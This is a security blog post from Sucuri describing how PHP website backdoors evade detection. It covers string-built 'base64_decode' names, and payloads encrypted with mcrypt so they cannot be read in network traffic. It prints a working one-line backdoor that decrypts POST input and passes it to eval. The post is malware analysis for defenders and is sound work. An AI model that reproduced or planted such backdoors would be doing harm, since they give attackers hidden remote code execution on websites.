• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Backdoor Evasion Using Encrypted Content

October 28, 2013Daniel Cid

0
SHARES
FacebookTwitterSubscribe

A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is the part of the code where it is hidden:

$g___g_='base'.(32*2).'_de'.'code';

Any tool that looks for eval, followed by base64_decode, or just flags on any base64_decode usage, will not find it.

That’s just one of the common type of evasion methods used by the bad guys. Another one we see often is the mix of “preg_replace” with the “e” flag to execute (eval) the content provided. The attackers do not stop there though.

Network Evasion using mcrypt

Website firewalls are becoming more common as website owners realize the need to protect their sites, and block attacks before they can do much damage. We are seeing some new types of backdoors that are created with the purpose of evading those firewalls. Instead of sending the malicious payload over the wire, the attackers encrypt it using “mcrypt_encrypt” so anyone monitoring the traffic over the network (either with a intrusion detection system or firewall), won’t know what is being sent.

When the request arrives at the backdoor, “mcrypt_decrypt” is used, and it executes (eval’s) the bad code. This is one example of backdoor that does it:

if (isset($_POST["x63ox64e"])){eval (mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"zx73x43Tx6bwx35x",base64_decode($_POST["x63ox64e"]),MCRYPT_MODE_ECB));}exit;?>

For reference, we have it fully decoded on ddecode. It basically gets the content of the POST request variable “code” and decrypts using Rijndeal (a symmetric encryption algorithm) using the key “zsCTkw5x”. If you don’t know the key, you would never be able to decrypt what is being sent. This is the decoded snipped core of the backdoor:

eval (mcrypt_decrypt (MCRYPT_RIJNDAEL_256,"zsCTkw5x",

And we see it injected with different passwords on different sites. What is interesting is that this backdoor is not very concerned about evading file level detection, but only network-level monitoring. So they are easy to be detected once you get access to the compromised site.

As always, it shows the arms race between the attackers and the defenders. Note that even though this type of backdoor can’t really be decoded or analyzed at the network level, anyone using our Website Firewall are protected due to our virtual hardening.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Encryption, Hacked Websites, Malware Updates, Website Backdoor

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Friv Jogos

    November 6, 2013

    Very useful and supportive article. I wish I can do all of that in a short period of time.

  2. botak

    November 14, 2013

    just do in php 5.3

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.